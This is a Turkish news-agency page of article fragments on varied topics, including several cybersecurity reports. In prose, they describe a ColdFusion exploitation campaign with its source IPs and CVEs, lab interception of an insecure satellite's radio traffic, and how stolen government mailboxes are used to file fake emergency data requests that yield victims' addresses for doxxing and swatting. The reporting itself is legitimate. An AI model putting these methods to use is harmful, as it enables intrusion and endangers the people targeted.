Sızıntı iddialarına ilişkin olarak NordVPN tarafından şu ana kadar kamuoyuna yansımış resmî bir açıklama bulunmuyor. Uzmanlar, iddiaların doğrulanması hâlinde bunun VPN hizmetlerine duyulan güven açısından önemli sonuçlar doğurabileceğini belirtiyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

20 Yıllık Açıklardan Güncel Zafiyetlere Kadar Tarama
Uzmanlar, saldırıların hem 20 yıla varan eski güvenlik açıklarını hem de 2023–2024 döneminde açıklanan kritik zafiyetleri hedef aldığını belirtti. ColdFusion’a odaklanan aşamada, 10’dan fazla kritik güvenlik açığının aktif biçimde istismar edilmeye çalışıldığı kaydedildi.

Saldırıların Zamanlaması Dikkat Çekti
Saldırı trafiğinin yüzde 68’inin Noel Günü gerçekleştiği bilgisi paylaşıldı. Araştırmacılar, bu zamanlamanın SOC ekiplerinin düşük kapasiteyle çalıştığı tatil dönemlerini bilinçli olarak hedef aldığını vurguladı.

Saldırı Kaynakları ve Teknikler
Analizlerde, saldırı trafiğinin büyük bölümünün 134.122.136.119 ve 134.122.136.96 IP adreslerinden geldiği tespit edildi. Kampanya kapsamında Interactsh ile out-of-band doğrulama, WDDX deserialization açıklarının istismarı ve JNDI/LDAP enjeksiyon saldırıları kullanıldı.

Öne Çıkan Güvenlik Açıkları
Saldırılarda en sık hedef alınan zafiyetler arasında CVE-2022-26134 (Confluence OGNL Injection) ve CVE-2014-6271 (Shellshock) yer aldı. Uzmanlar, ColdFusion’un bu kampanyanın yalnızca bir parçası olduğunu, saldırı yüzeyinin çok daha geniş olduğunu ifade etti.

Acil Önlem Çağrısı
Güvenlik ekiplerine, ilgili IP adreslerinin ve bağlantılı ASN’lerin engellenmesi, ColdFusion ve Java tabanlı altyapıların öncelikli olarak yamalanması ve özellikle tatil dönemlerine ait log kayıtlarının detaylı incelenmesi çağrısında bulunuldu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

İhracatta Kalıcı ve Sürdürülebilir Artış
Savunma Sanayii Başkanlığı yetkilileri, söz konusu verilerin yalnızca sayısal bir artışı değil, reel olarak ihracatın üç yılda iki katına çıkmasını ifade ettiğini belirtti. Yetkililer, “Ortaya çıkan tablo, savunma ve havacılık sanayiinde kalıcı ve sürdürülebilir bir dönüşümün somut göstergesidir.” değerlendirmesinde bulundu.

Vizyon ve Stratejik Yönelim Vurgusu
Yetkililer, elde edilen ivmenin Cumhurbaşkanı Recep Tayyip Erdoğan’ın ortaya koyduğu vizyon doğrultusunda şekillendiğini kaydederek, “Yerli ve millî teknoloji odaklı stratejik yönelim, uzun vadeli planlama ve uluslararası iş birlikleriyle güçlenen ihracat politikaları bu başarının temelini oluşturuyor.” ifadelerini kullandı.

Yüksek Katma Değerli Lokomotif Sektör
Savunma ve havacılık sanayiinin bugün yüksek katma değer üreten, küresel pazarlarda güvenle tercih edilen ve Türkiye’nin dış ticaret dengesine stratejik katkı sunan bir lokomotif sektör haline geldiği belirtildi. Yetkililer, sektörün ihracat performansının önümüzdeki dönemde de artarak sürmesinin beklendiğini aktardı.

Kararlılıkla Sürdürülen Büyüme
Açıklamalarda, Türkiye’nin savunma ve havacılık sanayiinde vizyonla büyüyen ve istikrarla güçlenen yolculuğunu kararlılıkla sürdürdüğü vurgulandı. İhracatın çeşitlenmesi ve yeni pazarlara açılımın öncelikli hedefler arasında yer aldığı ifade edildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Test faaliyetleri, manevra yapan dost ve düşman hava unsurlarının eş zamanlı olarak yer aldığı zorlu bir senaryo altında icra edildi. Senaryo kapsamında belirlenen hedefin başarıyla imha edilmesiyle, SİPER-1’in uzun menzilli önleme kabiliyeti ve operasyonel olgunluğu sahada bir kez daha teyit edildi.

“Operasyonel Olgunluk Sahada Doğrulandı”
Yetkililer, gerçekleştirilen testin, SİPER-1 sisteminin gerçek harp koşullarına yakın ortamlarda görev yapabilme yeteneğini ortaya koyduğunu belirterek, sistemin ÇELİKKUBBE’nin caydırıcılığını güçlendiren temel unsurlardan biri olduğunu vurguladı.

Milli İmkânlarla Geliştirildi, Seri Üretim Sürüyor
Millî imkânlarla geliştirilen ve seri imalat süreci kararlılıkla sürdürülen SİPER-1’in, Türk Silahlı Kuvvetlerinin hava savunma kapasitesine stratejik katkı sağladığı ifade edildi. Her yeni teslimatla birlikte, çok katmanlı hava savunma mimarisinin sahadaki etkinliğinin artırıldığı kaydedildi.

“ÇELİKKUBBE’nin Caydırıcılığı Güçleniyor”
Açıklamada, “Ürettikçe güçlenen ordumuz için bu stratejik sistemleri birer birer envantere kazandırıyor, ÇELİKKUBBE’nin sahadaki caydırıcılığını her teslimatla daha da ileri taşıyoruz.” ifadelerine yer verildi.

Projede görev alan ASELSAN ve ROKETSAN ekipleri, Millî Savunma Bakanlığı, Türk Silahlı Kuvvetleri personeli ve projede emeği geçen tüm çalışanlar başarılarından dolayı tebrik edildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırmacılar tarafından paylaşılan teknik çalışmada, PWNSAT ile yer istasyonu arasındaki haberleşmenin pasif olarak dinlenmesi ayrıntılı biçimde belgelendi. Çalışmada, yazılım tabanlı radyo sistemleri kullanılarak uyduya ait telemetri ve telekomut sinyallerinin tespit edilmesi, yakalanması ve çözümlenmesi adım adım gösterildi.

Yazılım Tabanlı Radyo ile Dinleme Senaryosu
Araştırmada, gerçek dünyadaki bir dinleme saldırısını taklit eden bir laboratuvar ortamı kuruldu. Hedef olarak, donanımı, yazılımı ve yer istasyonu bileşenleriyle bilerek savunmasız bırakılan PWNSAT 0.1 FlatSat sistemi seçildi. RTL-SDR ve HackRF One cihazları ile açık kaynak yazılımlar kullanılarak, uydunun aşağı yönlü telemetri ve yukarı yönlü telekomut trafiği izlendi.

“Gizli Frekans Güvenli Değildir”
Spektrum taraması sonucunda, uydunun LoRa tabanlı haberleşme yaptığı 915 MHz ISM bandında belirgin sinyal patlamaları tespit edildi. Araştırmacılar, bu bulgunun “gizli frekans” yaklaşımının tek başına bir güvenlik önlemi olmadığını açık biçimde ortaya koyduğunu vurguladı.

Şifreleme Olmadan Aktarılan Veriler
Çalışmada, CCSDS Space Packet Protocol kullanan telemetri verilerinin uygulama katmanında şifrelenmemiş olması nedeniyle, ham radyo sinyallerinin anlamlı sensör verilerine dönüştürülebildiği gösterildi. BME280 ve MPU6050 sensörlerinden gelen çevresel ve hareket verilerinin gerçek zamanlı olarak çözümlenebildiği kaydedildi.

Gelecekteki Risklere Dikkat Çekildi
Araştırmacılar, pasif dinlemenin çoğu zaman son adım olmadığını belirterek, telemetri verilerinin ele geçirilmesinin uydunun çalışma döngülerini ve sağlık durumunu açığa çıkardığını ifade etti. Bu durumun, daha ileri mantıksal ya da fiziksel saldırılar için zemin hazırlayabileceği kaydedildi.

Paylaşılan çalışmada, tüm deneylerin eğitim ve araştırma amacıyla, kontrollü bir laboratuvar ortamında gerçekleştirildiği özellikle vurgulandı. Yetkisiz uydu haberleşmesi dinlemenin ulusal ve uluslararası hukuka aykırı olabileceği hatırlatıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

BreachForums’ta İlk Alarm
2024’ün başlarında “Tamagami” adlı bir tehdit aktörünün BreachForums’ta yaptığı paylaşım, sistemin nasıl istismar edildiğini gözler önüne serdi. Söz konusu paylaşımda, “Kodex Global hesabımı satıyorum. Binance veya Coinbase üzerinden EDR ile istediğiniz kişiyi sorgulayabilirsiniz.” ifadeleri yer aldı. İddialara göre tekil sorgu bedelleri 300 dolara, tam erişim ise 5 bin dolara kadar çıktı.

Hedefte Sosyal Ağlar ve Kripto Platformları
Araştırmalara göre Kodex üzerinden yapılan sahte acil talepler yalnızca kripto borsalarıyla sınırlı kalmadı. Discord, Tinder ve LinkedIn gibi sosyal platformların da listede yer aldığı, bu yolla kullanıcıların IP adresleri, telefon numaraları ve fiziksel adreslerinin elde edildiği kaydedildi.

Sistem Nasıl İstismar Ediliyor
Uzmanlar, Kodex altyapısının teknik olarak güvenli olduğunu ancak insan faktörünün zayıf halka haline geldiğini vurguladı. Sürecin, bilgi hırsızlığı zararlıları ve oltalama saldırılarıyla ele geçirilen .gov ve .police uzantılı e-posta hesaplarıyla başladığı aktarıldı. Bu adreslerle Kodex’e kayıt yapıldığı ve “hayati tehlike” veya “terör şüphesi” gibi gerekçelerle platformlardan veri talep edildiği ifade edildi.

“EDR as a Service” Dönemi
Şubat 2025 tarihli paylaşımlar, sahte Kodex hesaplarının fiyatlarının 400 dolara kadar düştüğünü gösterdi. Bu durumun, düşük profilli saldırganların da sistemi kullanabilir hale gelmesine yol açtığı bildirildi. Aralık 2025 itibarıyla bazı grupların, “doğrulanmış Avrupa devlet e-postalarıyla EDR geçeriz” şeklinde açık ilanlar verdiği kaydedildi.

Sanal Veriden Fiziksel Tehdide
Elde edilen adres ve iletişim bilgilerinin yalnızca ifşa için değil, fiziksel tehditler için de kullanıldığı belirtildi. Uzmanlar, saldırganların bu verilerle sahte bomba ihbarı veya rehine bildirimi yaparak polis ekiplerini hedef adreslere yönlendirdiğini, bu yöntemin geçmişte ABD’de ölümle sonuçlanan olaylara neden olduğunu hatırlattı.

APT Grupları ve Fidye Çeteleri de Kullanıyor
Analizlerde, Lapsus$ ve Scattered Spider gibi organize grupların yanı sıra devlet destekli APT yapılanmalarının da Kodex EDR’yi stratejik bir araç olarak gördüğü ifade edildi. Fidye gruplarının, şirket yöneticilerinin aile bireylerine ulaşarak baskıyı artırdığı; APT gruplarının ise diplomat, gazeteci ve muhalifleri zararlı yazılım kullanmadan izleyebildiği aktarıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Son Bir Ayda 137 Tutuklama
Bakanlık açıklamasında, son bir ay içerisinde DEAŞ’a yönelik operasyonlarda 137 şüphelinin tutuklandığı, 97 şüpheli hakkında ise adli kontrol hükümleri uygulandığı bildirildi.

15 İlde Eş Zamanlı Operasyon
Bu sabah 15 ilde 108 ayrı adrese eş zamanlı operasyon düzenlendiği belirtilen açıklamada, operasyonlardan birinin saat 02.00’de Yalova’nın İsmetpaşa Mahallesi Seher Sokak’ta bulunan bir adrese gerçekleştirildiği kaydedildi.

Polislere Ateş Açıldı
Söz konusu adrese yapılan operasyon sırasında DEAŞ’lı teröristler tarafından güvenlik güçlerine ateş açıldığı belirtilerek, çıkan çatışmada 3 polisin şehit olduğu, 8 polis ve 1 bekçinin yaralandığı ifade edildi.

Kadınlar ve Çocuklar Tahliye Edildi
Operasyonun, adreste kadınlar ve çocukların bulunması nedeniyle büyük bir hassasiyetle yürütüldüğü vurgulanan açıklamada, 5 kadın ve 6 çocuğun sağ olarak tahliye edildiği, çatışmada 6 teröristin ölü olarak ele geçirildiği bildirildi. Etkisiz hale getirilen teröristlerin Türk vatandaşı olduğu açıklandı.

Operasyon 09.40’ta Tamamlandı
Yetkililer, operasyonun saat 09.40’ta tamamlandığını duyurdu. Açıklamada, “Bu topraklarda huzur ve güvenliği hedef alanlar, karşılarında daima cesareti ve fedakârlığıyla destan yazan güvenlik güçlerimizi bulacaktır.” ifadelerine yer verildi.

Şehit olan polisler için Allah’tan rahmet dilenen açıklamada, yaralı polisler ve bekçi için acil şifalar temennisinde bulunuldu.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Etkinlik, İnsanlık İttifakı ile Milli İrade Platformu öncülüğünde organize edilirken, Beykoz genelinde sabahın erken saatlerinde hareket edecek araçlarla vatandaşların buluşma alanına ulaştırılması planlandı. Organizasyon yetkilileri, Filistin’e destek vermek isteyen tüm Beykozluları bu anlamlı programa davet etti.

Beykoz’un Dört Bir Yanından Hareket
Yetkililer tarafından açıklanan bilgilere göre otobüsler; Kavacık Mezarlık Önü, Ozanlar Durağı, Dörtyol, Paşabahçe, Paşabahçe Meydanı, Tokatköy Ortaçeşme, Tokatköy Son Durak, Ortaçeşme Meydanı, Yenimahalle, Rüzgarlı Sokak Durağı, Yenimahalle Durağı (PTT Karşısı), Çavuşbaşı Cumhuriyet Caddesi Cami Önü, Fatih Mahallesi Muhtarlığı Önü, Beykoz Belediyesi önü ve Soğuksu Saat Kulesi noktalarından kalkacak.

Toplanma ve Kalkış Saatleri
Organizasyon kapsamında toplanma saati 06.30, otobüs kalkış saati ise 07.00 olarak belirlendi. Yetkililer, herhangi bir aksaklık yaşanmaması adına katılımcıların belirtilen saatten önce kalkış noktalarında hazır bulunmalarını istedi.

“Bu Bir Vicdan Çağrısıdır”
Etkinliği düzenleyen platformlar tarafından yapılan açıklamada, Filistin’de yaşananlara karşı sessiz kalınmayacağı vurgulanarak, “Bu sadece bir yürüyüş değil, vicdanların haykırışıdır. Filistin için omuz omuza veriyoruz.” ifadeleri kullanıldı.

İletişim Bilgisi Paylaşıldı
Etkinlikle ilgili detaylı bilgi almak isteyen vatandaşlar için iletişim numarası da paylaşıldı. Organizasyon yetkilileri, sorular ve yönlendirmeler için +90 (537) 860 90 93  numarasından bilgi alınabileceğini bildirdi.

Beykoz’dan yükselen bu çağrının, Filistin halkının yaşadığı insanlık dramına dikkat çekmesi ve kamuoyunda farkındalığı artırması hedefleniyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Sonuçlar İnternet Üzerinden Duyuruldu
TBMM İnsan Kaynakları Başkanlığı tarafından yapılan ilanda, “Kurumumuza sözleşmeli bilişim personeli alınması amacıyla gerçekleştirilen sözlü ve/veya uygulama sınavına katılan adaylar, sonuçlarını aşağıda yer alan bağlantı üzerinden öğrenebilirler.” ifadeleri kullanıldı.

Asıl Adaylara Tebligat ve Süre Hatırlatması
Duyuruda, sınavı asıl olarak kazanan adayların, kendilerine yapılan tebligat tarihinden itibaren en geç on iş günü içinde sözleşme imzalamak, sözleşmede belirtilen tarihte göreve başlamak ve gerekli belgeleri teslim etmek üzere Kuruma müracaat etmeleri gerektiği vurgulandı.

Hak Kaybına İlişkin Uyarı
TBMM İnsan Kaynakları Başkanlığı açıklamasında, “Kendilerine tebligat yapıldığı hâlde on iş günü içerisinde müracaat etmeyen, sözleşme imzaladığı hâlde süresinde işe başlamayan veya bu sürenin dolduğu gün itibarıyla on beş günü geçmeyen ve belgeyle ispat edilebilen kabul edilebilir mazeretini bildirmeyen adaylar, haklarından feragat etmiş sayılacaktır.” denildi.

İlan Tarihi ve İletişim
Sınav sonuçlarına ilişkin ilanın 12 Aralık 2025 tarihinde yayımlandığı bildirildi. Adayların bilgi almak için TBMM İnsan Kaynakları Başkanlığına (0312) 420 76 21 numaralı telefondan ulaşabileceği belirtildi.

Sonuç sorgulama adresi: https://sonuc.tbmm.gov.tr/

Kaynak: CUMHA - CUMHUR HABER AJANSI

Görev Tanımı Genişletildi
Kararnameye göre Siber Güvenlik Başkanlığı, siber güvenlik ve dijital devlet alanında mevzuat çalışmalarını yürütmek, ulusal strateji ve eylem planlarını hazırlamak ve uygulanmasını koordine etmekle görevlendirildi. Ulusal ve uluslararası düzenlemelere uyum sağlanması ile ilgili kurumlar arası koordinasyon da başkanlığın sorumlulukları arasında yer aldı.

Dijital Devlet ve Veri Standartları Vurgusu
Düzenleme kapsamında başkanlığa, dijital devlet kurumsal mimarisini oluşturma, kamu kurumlarının geliştireceği bilişim ürün ve hizmetlerine ilişkin idari, mali ve teknik ilkeleri belirleme yetkisi verildi. Ayrıca kamu projelerinde kullanılacak verilerin kalite kriterleri ve standartlarının belirlenmesi de görev alanına eklendi.

Teşkilat Yapısı Yeniden Düzenlendi
Kararname ile başkanlığın teşkilat yapısı; başkan, üç başkan yardımcısı ve hizmet birimleri şeklinde yeniden tanımlandı. Başkanlığın yurt içinde temsilcilik kurabilmesine ve yurt dışı teşkilatlanmaya yetkili olmasına ilişkin hükümler de düzenlemede yer aldı.

Yeni Genel Müdürlükler Kuruldu
Yapılan değişiklikle Kamu Yapay Zekâ Genel Müdürlüğü, Dijital Devlet Genel Müdürlüğü, Yönetim Hizmetleri Genel Müdürlüğü ve Strateji Geliştirme Dairesi Başkanlığı başkanlık bünyesine eklendi. Mevcut bazı birimler ise yürürlükten kaldırılarak yeni yapıya entegre edildi.

Kadrolar Yeniden Belirlendi
Kararnamenin ekinde yer alan listeyle Siber Güvenlik Başkanlığının merkez teşkilatına ait kadrolar yeniden düzenlendi. Başkan, başkan yardımcıları, genel müdürler, daire başkanları ve teknik personel dahil olmak üzere çok sayıda unvan için derece ve adetler yeniden tanımlandı.

Cumhurbaşkanı Recep Tayyip Erdoğan tarafından imzalanan kararname, yayımlandığı tarih itibarıyla yürürlüğe girdi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Hukuki Sorumluluk Kullanıcıya Aittir”
Binance TR tarafından paylaşılan metinde, hesap bilgilerinin üçüncü kişilerle paylaşılmaması gerektiği vurgulanarak, “Hesabın üçüncü kişiler tarafından ya da üçüncü kişiler adına kullanılması veya yasa dışı bahis ve kumar faaliyetleriyle ilişkilendirilmesi durumunda, ilgili işlemlerden doğabilecek hukuki sorumluluk kullanıcıya ait olacaktır.” ifadelerine yer verildi.

7258 ve 5549 Sayılı Kanunlara Atıf
Bilgilendirmede, yürürlükteki mevzuat kapsamında 7258 sayılı Kanun’un, yasa dışı bahis ve kumar faaliyetlerine doğrudan veya dolaylı aracılık edilmesini yasakladığı hatırlatıldı. Ayrıca 5549 sayılı Suç Gelirlerinin Aklanmasının Önlenmesi Hakkında Kanun uyarınca, kimlik tespiti gerektiren işlemlerde bir kişinin başka bir kişi hesabına işlem yapması halinde bunun önceden yazılı olarak bildirilmesinin zorunlu olduğu kaydedildi.

MASAK Düzenlemeleri Kapsamında Hesap Sınırlamaları
Açıklamada, MASAK düzenlemeleri doğrultusunda platform güvenliğini sağlamak ve yasal uyumu temin etmek amacıyla şüpheli durumlarda hesaplara geçici veya kalıcı kısıtlamalar uygulanabileceği belirtildi.

Genel Bilgilendirme Vurgusu
Binance TR, söz konusu duyurunun tüm kullanıcıları kapsayan genel bir bilgilendirme olduğunun altını çizerek, hesabın yasa dışı kumar ve bahis işlemlerinde kullanılması ya da üçüncü kişilere kullandırılması halinde doğacak tüm hukuki ve cezai sorumluluğun kullanıcıya ait olacağını yineledi. Kullanıcıların hesap güvenliğine ilişkin önerilere blog sayfasından ulaşabileceği, destek için ise 7/24 müşteri hizmetleriyle iletişime geçilebileceği bildirildi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Haber merkezinden alınan bilgilerde, şahsın bina içerisinde daire kapılarını yumrukladığı ve yüksek sesle gürültü yaptığı ifade edildi. Bunun üzerine olay yerine takviye ekip sevk edildi ve bina içerisine giriş sağlandı.

Bina Sakinleri Dinlendi
Polis ekipleri, bina yöneticisi ve apartman sakinleriyle görüşme gerçekleştirdi. Yapılan görüşmelerde, alkol aldığı belirtilen şahsın bina içinde rahatsızlık verdiği, komşuların bu durumdan şikâyetçi olduğu beyan edildi.

Tarafların ifadelerinde herhangi bir darp veya cebir olayı yaşanmadığı, bu nedenle doktor raporu almak istemedikleri kaydedildi. Şikâyetçi olan bina sakinlerinin talepleri doğrultusunda tutanak düzenlendi.

Hakları Bildirildi, Polis Merkezine Götürüldü
Polis ekipleri tarafından şüpheli şahsa, Ceza Muhakemesi Kanunu’nun 147’nci maddesi kapsamında hakları bildirildi. Şahıs, bina içerisinden alınarak ekip aracına bindirildi.

Şüpheli kişi, gerekli işlemlerin yapılabilmesi amacıyla Pursaklar Şehit Salih Eroğlu Polis Merkezi Amirliği’ne götürüldü. Olayla ilgili tutanak tanzim edilerek imza altına alındı.

Vatandaşlardan Yasal Düzenleme Çağrısı
Olayın ardından görüş bildiren bazı bina sakinleri ve çevre sakinleri, toplumda bu tür suçlarda mevcut yasal düzenlemelerin yetersiz kaldığını, suç işleyen kişilerin caydırıcı bir yaptırımla karşılaşmadığını düşündüklerini ifade etti. Vatandaşlar, benzer olayların önüne geçilebilmesi için devletin daha katı ve caydırıcı önlemler alması gerektiğini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açık Kaynak Model İndirilebilir Durumda
SAM Audio’nun model kodları ve çalıştırılabilir sürümü, Meta’nın resmi GitHub hesabı üzerinden açık kaynak olarak paylaşıldı. Kullanıcılar, modeli kendi bilgisayarlarında çalıştırarak farklı ses senaryolarını test edebiliyor. Modelin indirilebildiği resmi bağlantı şu şekilde paylaşıldı:
https://github.com/facebookresearch/sam-audio

Kurulum Gerektirmeyen Online Demo
Meta, SAM Audio’yu denemek isteyen kullanıcılar için çevrim içi bir demo da yayınladı. Tarayıcı üzerinden erişilebilen bu demo sayesinde, herhangi bir yazılım kurulumu yapmadan ses ayırma işlemleri gerçekleştirilebiliyor. Online test bağlantısı Meta tarafından şu adresten erişime açıldı:
https://aidemos.meta.com/segment-anything/editor/segment-audio

Sesleri Nesne Gibi Ayıran Yeni Yaklaşım
SAM Audio, sesleri tıpkı görsellerde nesne seçimi yapılır gibi ele alıyor. Model, bir ses kaydındaki hedef sesi başlangıç ve bitiş noktalarıyla tespit ederek ayırıyor. Çıktılar genellikle target ve residual olmak üzere iki parçadan oluşuyor.

Metin, Görsel ve Zaman Aralığıyla İstem
Model; “vokali al”, “arka plandaki sireni çıkar” gibi metin tabanlı istemleri, video üzerinde nesne işaretlemeye dayalı görsel istemleri ve belirli zaman aralıklarının seçildiği istemleri destekliyor. Bu yapı, müzik prodüksiyonu ve video düzenleme süreçlerinde esnek kullanım sağlıyor.

Vokal Ayrımı Neden Sözleri Otomatik Vermiyor
Uzmanlar, vokalin izole edilmesinin sözlerin otomatik olarak anlaşılması anlamına gelmediğini belirtiyor. Şarkı söyleme tarzı, efekt kullanımı, miks tercihleri ve aksan farklılıkları, transkripsiyon sürecini zorlaştıran unsurlar arasında yer alıyor. Bu nedenle SAM Audio’nun, konuşma tanıma ve metne dönüştürme modelleriyle birlikte kullanılması gerektiği vurgulanıyor.

Medya ve İçerik Üretiminde Yeni Alanlar
SAM Audio’nun; video içeriklerinde konuşma ayrımı, müzikte hızlı stem çıkarma, belirli ses olaylarının tespiti ve otomatik içerik analizi gibi alanlarda yaygınlaşması bekleniyor. Meta, modelin geliştiriciler ve içerik üreticiler tarafından farklı senaryolarda kullanılmasını hedefliyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Konut Kredisi Geriledi, İhtiyaç Kredisi Patladı
Gürer, 2014 yılında tüketici kredileri içinde konut kredilerinin payının yüzde 24,1 olduğunu, 2024 yılında bu oranın yüzde 8’e kadar düştüğünü söyledi. Aynı dönemde ihtiyaç kredilerinin payının yüzde 55’ten yüzde 88,8’e yükseldiğini vurgulayan Gürer, “Bu tablo, vatandaşın artık yatırım için değil; mutfak masrafı, kira ve faturalar için borçlandığını gösteriyor.” ifadelerini kullandı.

2025’in İlk 9 Ayında 2024 Aşıldı
Ömer Fethi Gürer, 2024 yılında toplam kullandırılan tüketici kredisi tutarının 1 trilyon 852 milyar TL olduğunu, 2025 yılının ilk 9 ayında bu rakamın 1 trilyon 994 milyar 394 milyon TL’ye çıktığını belirtti. Böylece sadece 9 ayda, 2024 yılının tamamının 142 milyar 394 milyon TL üzerine çıkıldığını kaydeden Gürer, artış oranının yaklaşık yüzde 7,7 olduğunu açıkladı.

2025’in ilk 9 ayında kullanılan kredilerin dağılımının da ihtiyaç kredisi ağırlığını sürdürdüğünü belirten Gürer, 1 trilyon 772 milyar TL ihtiyaç kredisi, 181 milyar TL konut kredisi ve yaklaşık 40 milyar TL taşıt kredisi kullandırıldığını ifade etti.

Vadeler Kısaldı, Baskı Arttı
Kredi vadelerindeki daralmaya da dikkat çeken Gürer, “Eskiden konut kredileriyle 10 yıllık planlar yapılırdı. Bugün yüksek faizler nedeniyle vadeler fiilen kısaldı.” dedi. 2024 itibarıyla ihtiyaç kredilerinin yüzde 74,9’unun 3 ila 12 ay vadeli olduğuna işaret eden Gürer, kısa vadeli borçlanmanın vatandaş üzerindeki baskıyı artırdığını söyledi.

10 Yılda 12 Kat Artış
Toplam tüketici kredisi tutarının 2014 yılında 151 milyar TL iken, 2024 yılında 1 trilyon 852 milyar TL’ye çıktığını belirten Gürer, bu 12 katlık artışın alım gücünden değil, enflasyonist baskıdan kaynaklandığını vurguladı. 2025 verilerinin de borçlanma eğiliminin sürdüğünü gösterdiğini dile getirdi.

“7’den 70’e Borçla Yaşıyoruz”
Gençler ve yaşlılar arasındaki kredi kullanımındaki artışa da değinen Gürer, 18-25 yaş grubunda kredi kullanan kişi sayısının 2014’te yaklaşık 965 bin iken, 2024’te 2 milyon 866 bine yükseldiğini söyledi. Gürer, “Gençler daha 30 yaşına gelmeden icra daireleriyle tanışıyor. Emekliler ise maaşı yetmediği için bankaya yöneliyor. 7’den 70’e borçla yaşıyoruz.” dedi.

Orta Sınıf Eriyor
2014 yılında tüketici kredisi kullanan kişi sayısının 10,7 milyon iken, 2024’te 26,8 milyona çıktığını hatırlatan Ömer Fethi Gürer, “Kredilerin konuttan nakit ihtiyacına kayması, orta sınıfın eridiğini gösteriyor. Bankalar kazanırken, dar ve orta gelirli vatandaş faiz yükü altında eziliyor.” ifadeleriyle değerlendirmesini tamamladı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Mutlu Azınlık Tropikal Meyveleri Tüketiyor”
Gürer, “Tropikal meyveler son yıllarda ülkemizde de üretilmeye başlandı, bazı ürünlerde ihracat dahi yapılıyor. Ancak bu ürünler daha çok mutlu bir azınlığın tercihleri arasında yer alıyor. Emekli ve asgari ücretli için bu ürünlerin tüketimi olası değil. Emekli simide muhtaçken, bir eli yağda bir eli balda olanların sofralarında tropikal meyveler bulunuyor.” dedi.

Market Fiyatları Dikkat Çekiyor
Gürer, zincir marketlerde tropikal meyvelerin tane ile satıldığını belirterek, “Bir adet mango 79 lira, kivi 30 lira, avokado 50 lira, ananas 129 liradan satılıyor. Bu fiyatların daha da üzerinde satış yapan marketler var. Kumkuat gibi ürünler raflarda yer alırken, yerli üretim artmasına rağmen ithal muz da marketlerde bulunuyor.” ifadelerini kullandı.

Ananasta İhracat Var, İthalat Daha Hızlı Artıyor
Ömer Fethi Gürer, 2024’te 166 ton ananas ihracatından 229 bin dolar gelir elde edildiğini, buna karşılık 28 bin 94 ton ithalat için yaklaşık 11 milyon dolar ödendiğini açıkladı. 2025’te ihracat 208 tona çıkarken, ithalatın 33 bin 429 tona yükseldiğini ve döviz ödemesinin 13 milyon doları aştığını belirtti.

Kivide Döviz Ödemesi Katlandı
Kivi üretiminin Karadeniz ve Batı Karadeniz’de arttığını vurgulayan Gürer, “2024’te 3 bin 361 ton kivi ithalatı için 1,4 milyon dolar ödendi. 2025’te ithalat 5 bin 356 tona, döviz ödemesi 3,4 milyon dolara çıktı. Miktar yüzde 59, döviz ödemesi yüzde 138 arttı. Yerli üretim varken ithalat üreticiyi sıkıntıya sokuyor.” dedi.

Mango Grubunda Açık Derinleşti
Guava armudu, mango ve mangost grubunda 2024’te 236 ton ihracata karşılık 2 bin 744 ton ithalat yapıldığını belirten Gürer, 2025’te ihracat artmasına rağmen ithalatın çok daha hızlı yükseldiğini, dış ticaret açığının derinleştiğini kaydetti.

Avokadoda Yön Değişimi
Gürer, avokadoda 2024’te 1.840 ton ihracat yapıldığını, 2025’te ise ihracatın 700 tona düştüğünü açıkladı. Aynı dönemde ithalatın yaklaşık iki katına çıktığını belirten Gürer, “İhracat düşerken ithalat hızla arttı.” dedi.

Hindistan Cevizinde Birim Maliyet Arttı
Hindistan cevizi ithalatında miktarın azalmasına rağmen ödenen dövizin arttığını ifade eden Gürer, “Miktar düşüyor ama birim maliyet yükseliyor.” değerlendirmesinde bulundu.

“Üretebileceğimiz Ürünü İthal Ediyoruz”
Ömer Fethi Gürer, tropikal meyvelerde planlı üretim ve destekleme politikalarının önemine dikkat çekerek, “Uygun iklim koşullarında üretimi artırıp ithalatı azaltmak mümkün. Yerli üretim varken tropikal meyve pazarını ithalatla büyütmek doğru değil. Ürün deseni iklime, verimliliğe ve iklim değişikliği risklerine göre öngörülü biçimde planlanmalıdır.” ifadelerini kullandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Tek Pencerede Çoklu Görev İmkanı
Chrome Split View, bir tarayıcı penceresini iki ayrı panel hâline getirerek farklı sekmelerin paralel olarak kullanılmasını sağlıyor. Özellik sayesinde kullanıcılar, araştırma yaparken not alabiliyor, iki farklı siteyi karşılaştırabiliyor ya da video izlerken başka bir içerikte gezinebiliyor.

Kullanım Yöntemleri Netleşti
Yeni özellik, Chrome’da birden fazla yöntemle aktif edilebiliyor. Bir sekmeye sağ tıklandığında açılan menüde “New Split View with Current Tab” veya benzeri seçenekler yer alıyor. Bu seçenek kullanıldığında sekme, ekranın sol ya da sağ tarafına otomatik olarak yerleştiriliyor.

Bazı güncel Chrome sürümlerinde ise sekmenin pencerenin kenarına sürüklenmesiyle ekran otomatik olarak ikiye bölünüyor. Paneller arasındaki sınır, sürüklenerek istenilen genişlikte ayarlanabiliyor.

Deneysel Aşamadan Kararlı Sürüme
Split View özelliği, önceki aylarda Chrome flags altında sınırlı sayıda kullanıcıyla test ediliyordu. Son güncellemelerle birlikte özellik kararlı sürüme dahil edildi ve geniş kullanıcı kitlesine kademeli olarak ulaştırıldı. Güncel Chrome sürümünü kullanan birçok kullanıcı, bu seçeneğin artık varsayılan olarak aktif olduğunu bildiriyor.

Üretkenlik Odaklı Tasarım
Chrome’un yeni bölünmüş ekran desteği; araştırma ve yazı yazma, fiyat karşılaştırmaları, belge inceleme ve video izleme gibi senaryolarda önemli kolaylık sağlıyor. Sekmeler arasında sürekli geçiş yapma ihtiyacını azaltan özellik, tarayıcı içi verimliliği artırmayı hedefliyor.

Rakip Tarayıcılarla Eşitlendi
